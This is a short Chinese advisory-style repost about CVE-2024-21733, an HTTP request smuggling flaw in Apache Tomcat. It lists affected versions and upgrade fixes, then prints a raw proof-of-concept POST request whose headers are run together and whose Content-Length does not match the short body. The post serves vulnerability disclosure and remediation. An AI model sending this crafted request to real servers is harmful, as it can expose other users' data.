-
漏洞编号: CVE-2024-21733 -
影响供应商: Apache软件基金会 -
受影响版本: -
Apache Tomcat 9.0.0-M11 至 9.0.43 -
Apache Tomcat 8.5.7 至 8.5.63
-
升级至 Apache Tomcat 9.0.44 或更高版本 -
升级至 Apache Tomcat 8.5.64 或更高版本
POST / HTTP/1.1Host: hostnameSec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: keep-aliveContent-Length: 6Content-Type: application/x-www-form-urlencodedX
原文始发于微信公众号(Ots安全):4,660 美元赏金 CVE-2024-21733 Apache Tomcat HTTP 请求走私(客户端异步)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论